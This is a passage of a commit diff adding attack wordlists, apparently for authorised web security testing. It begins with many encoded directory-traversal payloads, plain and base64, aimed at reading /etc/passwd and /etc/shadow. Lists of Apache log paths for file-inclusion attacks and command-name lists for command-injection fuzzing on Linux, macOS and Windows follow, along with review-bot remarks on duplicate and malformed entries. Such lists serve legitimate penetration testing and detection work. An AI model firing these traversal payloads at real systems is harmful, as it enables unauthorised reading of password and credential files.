..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
|
||||
L2V0Yy9tYXN0ZXIucGFzc3dk
|
||||
L21hc3Rlci5wYXNzd2Q=
|
||||
ZXRjL3Bhc3N3ZA==
|
||||
ZXRjL3NoYWRvdyUwMA==
|
||||
L2V0Yy9wYXNzd2Q=
|
||||
L2V0Yy9wYXNzd2QlMDA=
|
||||
Li4vZXRjL3Bhc3N3ZA==
|
||||
Li4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
|
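--- a/attack/lfi/common-ms-httpd-log-locations.txt
+++ b/attack/lfi/common-ms-httpd-log-locations.txt
@@ -0,0 +1,6 @@
+\Program Files\Apache Group\Apache\logs\access.log
+\Program Files\Apache Group\Apache\logs\error.log
+\Program Files\Apache Group\Apache\conf\httpd.conf
+\Program Files\Apache Group\Apache2\conf\httpd.conf
+\Program Files (x86)\Apache Group\Apache\logs\access.log
+\Program Files (x86)\Apache Group\Apache\logs\error.log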
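--- a/attack/lfi/common-unix-httpd-log-locations.txt
+++ b/attack/lfi/common-unix-httpd-log-locations.txt
@@ -0,0 +1,30 @@
+/apache/logs/error.log
+/apache/logs/access.log
+/apache/logs/error.log
+/apache/logs/access.log
+/apache/logs/error.log
+/apache/logs/access.log
+/etc/httpd/logs/acces_log
+/etc/httpd/logs/acces.log
+/etc/httpd/logs/error_log
+/etc/httpd/logs/error.log
+/var/www/logs/access_log
+/var/www/logs/access.log
+/usr/local/apache/logs/access_log
+/usr/local/apache/logs/access.log
+/var/log/apache/access_log
+/var/log/apache2/access_log
+/var/log/apache/access.log
+/var/log/apache2/access.log
+/var/log/access_log
+/var/log/access.log
+/var/www/logs/error_log
+/var/www/logs/error.log
+/usr/local/apache/logs/error_log
+/usr/local/apache/logs/error.log
+/var/log/apache/error_log
+/var/log/apache2/error_log
+/var/log/apache/error.log
+/var/log/apache2/error.log
+/var/log/error_log
+/var/log/error.log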
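Review bot: The first six entries of attack/lfi/common-unix-httpd-log-locations.txt are `/apache/logs/error.log` and `/apache/logs/access.log` repeated three times each, so the file holds 26 distinct values rather than the 30 its line count suggests. Exact duplicates only add request volume and duplicate findings to an authorised test run, and they skew any count taken over the list. The same applies to attack/os-cmd-execution/Commands-WindowsPowershell.txt in this commit, where `get-childitem`, `remove-item`, `select-object` and the whole `*-itemproperty` group appear more than once. An order-preserving de-duplication step when the lists are imported would keep them at one entry per value.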
571
attack/os-cmd-execution/Commands-Linux.txt
Normal file
571
attack/os-cmd-execution/Commands-Linux.txt
Normal file
|
@ -0,0 +1,571 @@
|
|||
accept
|
||||
access
|
||||
aclocal
|
||||
aconnect
|
||||
acpi
|
||||
acpi_available
|
||||
acpid
|
||||
addr2line
|
||||
addresses
|
||||
agetty
|
||||
alsactl
|
||||
amidi
|
||||
amixer
|
||||
anacron
|
||||
aplay
|
||||
aplaymidi
|
||||
apm
|
||||
apmd
|
||||
apropos
|
||||
apt
|
||||
ar
|
||||
arch
|
||||
arecord
|
||||
arecordmidi
|
||||
arp
|
||||
as
|
||||
at
|
||||
atd
|
||||
atq
|
||||
atrm
|
||||
audiosend
|
||||
aumix
|
||||
autoconf
|
||||
autoheader
|
||||
automake
|
||||
autoreconf
|
||||
autoscan
|
||||
autoupdate
|
||||
badblocks
|
||||
banner
|
||||
basename
|
||||
bash
|
||||
batch
|
||||
bc
|
||||
biff
|
||||
bison
|
||||
bzcmp
|
||||
bzdiff
|
||||
bzgrep
|
||||
bzip2
|
||||
bzless
|
||||
bzmore
|
||||
c++
|
||||
cal
|
||||
cardctl
|
||||
cardmgr
|
||||
cat
|
||||
cc
|
||||
cdda2wav
|
||||
cdparanoia
|
||||
cdrdao
|
||||
cdrecord
|
||||
cfdisk
|
||||
c++filt
|
||||
chage
|
||||
chattr
|
||||
chfn
|
||||
chgrp
|
||||
chkconfig
|
||||
chmod
|
||||
chown
|
||||
chpasswd
|
||||
chroot
|
||||
chrt
|
||||
chsh
|
||||
chvt
|
||||
cksum
|
||||
clear
|
||||
cmp
|
||||
col
|
||||
colcrt
|
||||
colrm
|
||||
column
|
||||
comm
|
||||
compress
|
||||
cp
|
||||
cpio
|
||||
cpp
|
||||
crond
|
||||
crontab
|
||||
csplit
|
||||
ctags
|
||||
cupsd
|
||||
cut
|
||||
cvs
|
||||
date
|
||||
dd
|
||||
deallocvt
|
||||
debugfs
|
||||
depmod
|
||||
devdump
|
||||
df
|
||||
diff
|
||||
diff3
|
||||
dig
|
||||
dir
|
||||
dircolors
|
||||
dirname
|
||||
disable
|
||||
dlpsh
|
||||
dmesg
|
||||
dnsdomainname
|
||||
dnssec-keygen
|
||||
dnssec-makekeyset
|
||||
dnssec-signkey
|
||||
dnssec-signzone
|
||||
doexec
|
||||
domainname
|
||||
dosfsck
|
||||
du
|
||||
dump
|
||||
dumpe2fs
|
||||
dumpkeys
|
||||
e2fsck
|
||||
e2image
|
||||
e2label
|
||||
echo
|
||||
edquota
|
||||
egrep
|
||||
eject
|
||||
elvtune
|
||||
emacs
|
||||
enable
|
||||
env
|
||||
envsubst
|
||||
esd
|
||||
esdcat
|
||||
esd-config
|
||||
esdctl
|
||||
esddsp
|
||||
esdmon
|
||||
esdplay
|
||||
esdrec
|
||||
esdsample
|
||||
etags
|
||||
ex
|
||||
expand
|
||||
expr
|
||||
factor
|
||||
false
|
||||
fc-cache
|
||||
fc-list
|
||||
fdformat
|
||||
fdisk
|
||||
fetchmail
|
||||
fgconsole
|
||||
fgrep
|
||||
file
|
||||
find
|
||||
finger
|
||||
fingerd
|
||||
flex
|
||||
fmt
|
||||
fold
|
||||
formail
|
||||
free
|
||||
fsck
|
||||
ftp
|
||||
ftpd
|
||||
fuser
|
||||
g++
|
||||
gawk
|
||||
gcc
|
||||
gdb
|
||||
getent
|
||||
getkeycodes
|
||||
gpasswd
|
||||
gpg
|
||||
gpgsplit
|
||||
gpgv
|
||||
gpm
|
||||
gprof
|
||||
grep
|
||||
groff
|
||||
groffer
|
||||
groupadd
|
||||
groupdel
|
||||
groupmod
|
||||
groups
|
||||
grpck
|
||||
grpconv
|
||||
gs
|
||||
gunzip
|
||||
gzexe
|
||||
gzip
|
||||
halt
|
||||
hdparm
|
||||
head
|
||||
hexdump
|
||||
host
|
||||
hostid
|
||||
hostname
|
||||
htdigest
|
||||
hwclock
|
||||
iconv
|
||||
id
|
||||
ifconfig
|
||||
imapd
|
||||
inetd
|
||||
info
|
||||
init
|
||||
insmod
|
||||
install
|
||||
ipcrm
|
||||
ipcs
|
||||
iptables
|
||||
iptables-restore
|
||||
iptables-save
|
||||
isodump
|
||||
isoinfo
|
||||
isosize
|
||||
isovfy
|
||||
ispell
|
||||
join
|
||||
kbd_mode
|
||||
kbdrate
|
||||
kernelversion
|
||||
kill
|
||||
killall
|
||||
killall5
|
||||
klogd
|
||||
kudzu
|
||||
last
|
||||
lastb
|
||||
lastlog
|
||||
ld
|
||||
ldconfig
|
||||
ldd
|
||||
less
|
||||
lesskey
|
||||
lftp
|
||||
lftpget
|
||||
link
|
||||
ln
|
||||
loadkeys
|
||||
locale
|
||||
locate
|
||||
lockfile
|
||||
logger
|
||||
login
|
||||
logname
|
||||
logrotate
|
||||
look
|
||||
losetup
|
||||
lpadmin
|
||||
lpinfo
|
||||
lpmove
|
||||
lpq
|
||||
lpr
|
||||
lprm
|
||||
lpstat
|
||||
ls
|
||||
lsattr
|
||||
lsmod
|
||||
lspci
|
||||
lsusb
|
||||
m4
|
||||
mail
|
||||
mailq
|
||||
mailstats
|
||||
mailto
|
||||
make
|
||||
makedbm
|
||||
makemap
|
||||
man
|
||||
manpath
|
||||
mattrib
|
||||
mbadblocks
|
||||
mcat
|
||||
mcd
|
||||
mcopy
|
||||
md5sum
|
||||
mdel, mdeltree
|
||||
mdir
|
||||
mdu
|
||||
merge
|
||||
mesg
|
||||
metamail
|
||||
metasend
|
||||
mformat
|
||||
mimencode
|
||||
minfo
|
||||
mkdir
|
||||
mkdosfs
|
||||
mke2fs
|
||||
mkfifo
|
||||
mkfs
|
||||
mkfs.ext3
|
||||
mkisofs
|
||||
mklost+found
|
||||
mkmanifest
|
||||
mknod
|
||||
mkraid
|
||||
mkswap
|
||||
mktemp
|
||||
mlabel
|
||||
mmd
|
||||
mmount
|
||||
mmove
|
||||
modinfo
|
||||
modprobe
|
||||
more
|
||||
mount
|
||||
mountd
|
||||
mpartition
|
||||
mpg123
|
||||
mpg321
|
||||
mrd
|
||||
mren
|
||||
mshowfat
|
||||
mt
|
||||
mtools
|
||||
mtoolstest
|
||||
mtype
|
||||
mv
|
||||
mzip
|
||||
named
|
||||
namei
|
||||
nameif
|
||||
netstat
|
||||
newaliases
|
||||
newgrp
|
||||
newusers
|
||||
nfsd
|
||||
nfsstat
|
||||
nice
|
||||
nm
|
||||
nohup
|
||||
nslookup
|
||||
nsupdate
|
||||
objcopy
|
||||
objdump
|
||||
od
|
||||
openvt
|
||||
passwd
|
||||
paste
|
||||
patch
|
||||
pathchk
|
||||
perl
|
||||
pidof
|
||||
ping
|
||||
pinky
|
||||
pmap
|
||||
portmap
|
||||
poweroff
|
||||
pppd
|
||||
pr
|
||||
praliases
|
||||
printenv
|
||||
printf
|
||||
ps
|
||||
ptx
|
||||
pwck
|
||||
pwconv
|
||||
pwd
|
||||
python
|
||||
quota
|
||||
quotacheck
|
||||
quotaoff
|
||||
quotaon
|
||||
quotastats
|
||||
raidstart
|
||||
ramsize
|
||||
ranlib
|
||||
rarpd
|
||||
rcp
|
||||
rdate
|
||||
rdev
|
||||
rdist
|
||||
rdistd
|
||||
readcd
|
||||
readelf
|
||||
readlink
|
||||
reboot
|
||||
reject
|
||||
rename
|
||||
renice
|
||||
repquota
|
||||
reset
|
||||
resize2fs
|
||||
restore
|
||||
rev
|
||||
rexec
|
||||
rexecd
|
||||
richtext
|
||||
rlogin
|
||||
rlogind
|
||||
rm
|
||||
rmail
|
||||
rmdir
|
||||
rmmod
|
||||
rndc
|
||||
rootflags
|
||||
route
|
||||
routed
|
||||
rpcgen
|
||||
rpcinfo
|
||||
rpm
|
||||
rsh
|
||||
rshd
|
||||
rsync
|
||||
runlevel
|
||||
rup
|
||||
ruptime
|
||||
rusers
|
||||
rusersd
|
||||
rwall
|
||||
rwho
|
||||
rwhod
|
||||
sane-find-scanner
|
||||
scanadf
|
||||
scanimage
|
||||
scp
|
||||
screen
|
||||
script
|
||||
sdiff
|
||||
sed
|
||||
sendmail
|
||||
sensors
|
||||
seq
|
||||
setfdprm
|
||||
setkeycodes
|
||||
setleds
|
||||
setmetamode
|
||||
setquota
|
||||
setsid
|
||||
setterm
|
||||
sftp
|
||||
sh
|
||||
sha1sum
|
||||
showkey
|
||||
showmount
|
||||
shred
|
||||
shutdown
|
||||
size
|
||||
skill
|
||||
slabtop
|
||||
slattach
|
||||
sleep
|
||||
slocate
|
||||
snice
|
||||
sort
|
||||
split
|
||||
ssh
|
||||
ssh-add
|
||||
ssh-agent
|
||||
sshd
|
||||
ssh-keygen
|
||||
ssh-keyscan
|
||||
stat
|
||||
statd
|
||||
strace
|
||||
strfile
|
||||
strings
|
||||
strip
|
||||
stty
|
||||
su
|
||||
sudo
|
||||
sum
|
||||
swapoff
|
||||
swapon
|
||||
sync
|
||||
sysctl
|
||||
sysklogd
|
||||
syslogd
|
||||
tac
|
||||
tail
|
||||
tailf
|
||||
talk
|
||||
talkd
|
||||
tar
|
||||
taskset
|
||||
tcpd
|
||||
tcpdump
|
||||
tcpslice
|
||||
tee
|
||||
telinit
|
||||
telnet
|
||||
telnetd
|
||||
test
|
||||
tftp
|
||||
tftpd
|
||||
time
|
||||
tload
|
||||
tmpwatch
|
||||
top
|
||||
touch
|
||||
tr
|
||||
tracepath
|
||||
traceroute
|
||||
troff
|
||||
true
|
||||
tset
|
||||
tsort
|
||||
tty
|
||||
tune2fs
|
||||
tunelp
|
||||
ul
|
||||
umount
|
||||
uname
|
||||
uncompress
|
||||
unexpand
|
||||
unicode_start
|
||||
unicode_stop
|
||||
uniq
|
||||
uptime
|
||||
useradd
|
||||
userdel
|
||||
usermod
|
||||
users
|
||||
usleep
|
||||
uudecode
|
||||
uuencode
|
||||
uuidgen
|
||||
vdir
|
||||
vi
|
||||
vidmode
|
||||
vim
|
||||
vmstat
|
||||
volname
|
||||
w
|
||||
wall
|
||||
warnquota
|
||||
watch
|
||||
wc
|
||||
wget
|
||||
whatis
|
||||
whereis
|
||||
which
|
||||
who
|
||||
whoami
|
||||
whois
|
||||
write
|
||||
xargs
|
||||
xinetd
|
||||
yacc
|
||||
yes
|
||||
ypbind
|
||||
ypcat
|
||||
ypinit
|
||||
ypmatch
|
||||
yppasswd
|
||||
yppasswdd
|
||||
yppoll
|
||||
yppush
|
||||
ypserv
|
||||
ypset
|
||||
yptest
|
||||
ypwhich
|
||||
ypxfr
|
||||
zcat
|
||||
zcmp
|
||||
zdiff
|
||||
zdump
|
||||
zforce
|
||||
zgrep
|
||||
zic
|
||||
zless
|
||||
zmore
|
||||
znew
|
||||
|
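Review bot: The entry `mdel, mdeltree` in attack/os-cmd-execution/Commands-Linux.txt puts two command names on one line, so a line-oriented consumer reads it as a single token that matches neither name; it should be two lines, `mdel` and `mdeltree`. The file also appears to end with an empty line, which becomes an empty entry for any consumer that does not skip blanks. Similar non-command entries sit in the sibling lists of this commit: a lone `a` opens Commands-Windows.txt, and Commands-WindowsPowershell.txt contains `run/call` and `quest`. If these lists are reused to build detection or deny rules, such entries either never match or, for `a` and the empty string, match far too broadly.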
233
attack/os-cmd-execution/Commands-OSX.txt
Normal file
233
attack/os-cmd-execution/Commands-OSX.txt
Normal file
|
@ -0,0 +1,233 @@
|
|||
alias
|
||||
alloc
|
||||
apropos
|
||||
awk
|
||||
basename
|
||||
bash
|
||||
bg
|
||||
bind
|
||||
bless
|
||||
break
|
||||
builtin
|
||||
bzip
|
||||
cal
|
||||
caller
|
||||
case
|
||||
cat
|
||||
cd
|
||||
chflags
|
||||
chgrp
|
||||
chmod
|
||||
chown
|
||||
chroot
|
||||
cksum
|
||||
clear
|
||||
cmp
|
||||
comm
|
||||
command
|
||||
complete
|
||||
continue
|
||||
cp
|
||||
cron
|
||||
crontab
|
||||
curl
|
||||
cut
|
||||
date
|
||||
dc
|
||||
dd
|
||||
declare
|
||||
defaults
|
||||
df
|
||||
diff
|
||||
diff3
|
||||
dig
|
||||
dirname
|
||||
dirs
|
||||
diskutil
|
||||
disown
|
||||
ditto
|
||||
dot_clean
|
||||
drutil
|
||||
dscacheutil
|
||||
dscl
|
||||
du
|
||||
echo
|
||||
ed
|
||||
enable
|
||||
env
|
||||
eval
|
||||
exec
|
||||
exit
|
||||
expand
|
||||
expect
|
||||
export
|
||||
expr
|
||||
false
|
||||
fc
|
||||
fdisk
|
||||
fg
|
||||
file
|
||||
find
|
||||
fmt
|
||||
fold
|
||||
for
|
||||
fsck
|
||||
fsaclctl
|
||||
fs_usage
|
||||
ftp
|
||||
GetFileInfo
|
||||
getopt
|
||||
getopts
|
||||
goto
|
||||
grep
|
||||
groups
|
||||
gzip
|
||||
hash
|
||||
head
|
||||
hdiutil
|
||||
history
|
||||
hostname
|
||||
id
|
||||
if
|
||||
info
|
||||
install
|
||||
jobs
|
||||
join
|
||||
kextfind
|
||||
kickstart
|
||||
kill
|
||||
l
|
||||
last
|
||||
launchctl
|
||||
ll
|
||||
less
|
||||
let
|
||||
lipo
|
||||
ln
|
||||
local
|
||||
locate
|
||||
logname
|
||||
login
|
||||
logout
|
||||
lpr
|
||||
lprm
|
||||
lpstat
|
||||
ls
|
||||
lsregister
|
||||
lsbom
|
||||
lsof
|
||||
man
|
||||
mdfind
|
||||
mdutil
|
||||
mkdir
|
||||
mkfifo
|
||||
more
|
||||
mount
|
||||
mv
|
||||
net
|
||||
netstat
|
||||
networksetup
|
||||
nice
|
||||
nohup
|
||||
ntfs.util
|
||||
onintr
|
||||
open
|
||||
opensnoop
|
||||
osacompile
|
||||
osascript
|
||||
passwd
|
||||
paste
|
||||
pbcopy
|
||||
pbpaste
|
||||
pico
|
||||
ping
|
||||
pkgutil
|
||||
plutil
|
||||
pmset
|
||||
popd
|
||||
pr
|
||||
printenv
|
||||
printf
|
||||
ps
|
||||
pushd
|
||||
pwd
|
||||
quota
|
||||
rcp
|
||||
read
|
||||
readonly
|
||||
reboot
|
||||
return
|
||||
rev
|
||||
rm
|
||||
rmdir
|
||||
rpm
|
||||
rsync
|
||||
say
|
||||
screen
|
||||
screencapture
|
||||
sdiff
|
||||
security
|
||||
sed
|
||||
select
|
||||
set
|
||||
setfile
|
||||
shift
|
||||
shopt
|
||||
shutdown
|
||||
sips
|
||||
sleep
|
||||
softwareupdate
|
||||
sort
|
||||
source
|
||||
split
|
||||
stop
|
||||
su
|
||||
sudo
|
||||
sum
|
||||
suspend
|
||||
sw_vers
|
||||
system_profiler
|
||||
systemsetup
|
||||
tail
|
||||
tar
|
||||
tee
|
||||
test
|
||||
textutil
|
||||
time
|
||||
times
|
||||
top
|
||||
touch
|
||||
tr
|
||||
trap
|
||||
traceroute
|
||||
true
|
||||
tty
|
||||
type
|
||||
ufs.util
|
||||
ulimit
|
||||
umask
|
||||
umount
|
||||
unalias
|
||||
uname
|
||||
unexpand
|
||||
uniq
|
||||
units
|
||||
unset
|
||||
until
|
||||
users
|
||||
uuencode
|
||||
uudecode
|
||||
uuidgen
|
||||
uucp
|
||||
vi
|
||||
wait
|
||||
wc
|
||||
whatis
|
||||
where
|
||||
which
|
||||
while
|
||||
who
|
||||
whoami
|
||||
write
|
||||
xargs
|
||||
yes
|
158
attack/os-cmd-execution/Commands-Windows.txt
Normal file
158
attack/os-cmd-execution/Commands-Windows.txt
Normal file
|
@ -0,0 +1,158 @@
|
|||
a
|
||||
arp
|
||||
assoc
|
||||
at
|
||||
atmadm
|
||||
attrib
|
||||
bootcfg
|
||||
break
|
||||
cacls
|
||||
call
|
||||
change
|
||||
chcp
|
||||
chdir
|
||||
chkdsk
|
||||
chkntfs
|
||||
cipher
|
||||
cls
|
||||
cmd
|
||||
cmstp
|
||||
color
|
||||
comp
|
||||
compact
|
||||
convert
|
||||
copy
|
||||
cprofile
|
||||
cscript
|
||||
date
|
||||
defrag
|
||||
del
|
||||
dir
|
||||
diskcomp
|
||||
diskcopy
|
||||
diskpart
|
||||
doskey
|
||||
driverquery
|
||||
echo
|
||||
endlocal
|
||||
eventcreate
|
||||
eventquery
|
||||
eventtriggers
|
||||
evntcmd
|
||||
exit
|
||||
expand
|
||||
fc
|
||||
filter
|
||||
find
|
||||
findstr
|
||||
finger
|
||||
flattemp
|
||||
for
|
||||
format
|
||||
fsutil
|
||||
ftp
|
||||
ftype
|
||||
getmac
|
||||
goto
|
||||
gpresult
|
||||
gpupdate
|
||||
graftabl
|
||||
help
|
||||
helpctr
|
||||
hostname
|
||||
if
|
||||
ipconfig
|
||||
ipseccmd
|
||||
ipxroute
|
||||
irftp
|
||||
label
|
||||
lodctr
|
||||
logman
|
||||
lpq
|
||||
lpr
|
||||
macfile
|
||||
mkdir
|
||||
mmc
|
||||
mode
|
||||
more
|
||||
mountvol
|
||||
move
|
||||
msiexec
|
||||
msinfo32
|
||||
nbtstat
|
||||
net
|
||||
netsh
|
||||
netstat
|
||||
nslookup
|
||||
ntbackup
|
||||
ntcmdprompt
|
||||
ntsd
|
||||
openfiles
|
||||
pagefileconfig
|
||||
path
|
||||
pathping
|
||||
pause
|
||||
pbadmin
|
||||
pentnt
|
||||
perfmon
|
||||
ping
|
||||
popd
|
||||
print
|
||||
prncnfg
|
||||
prndrvr
|
||||
prnjobs
|
||||
prnmngr
|
||||
prnport
|
||||
prnqctl
|
||||
prompt
|
||||
pushd
|
||||
query
|
||||
rasdial
|
||||
rcp
|
||||
recover
|
||||
reg
|
||||
regsvr32
|
||||
relog
|
||||
rem
|
||||
rename
|
||||
replace
|
||||
rexec
|
||||
rmdir
|
||||
route
|
||||
rsh
|
||||
rsm
|
||||
runas
|
||||
sc
|
||||
schtasks
|
||||
secedit
|
||||
set
|
||||
setlocal
|
||||
shift
|
||||
shutdown
|
||||
sort
|
||||
start
|
||||
subst
|
||||
systeminfo
|
||||
sfc
|
||||
taskkill
|
||||
tasklist
|
||||
tcmsetup
|
||||
telnet
|
||||
tftp
|
||||
time
|
||||
title
|
||||
tracerpt
|
||||
tracert
|
||||
tree
|
||||
type
|
||||
typeperf
|
||||
unlodctr
|
||||
ver
|
||||
verify
|
||||
vol
|
||||
vssadmin
|
||||
w32tm
|
||||
winnt
|
||||
winnt32
|
||||
wmic
|
||||
xcopy
|
164
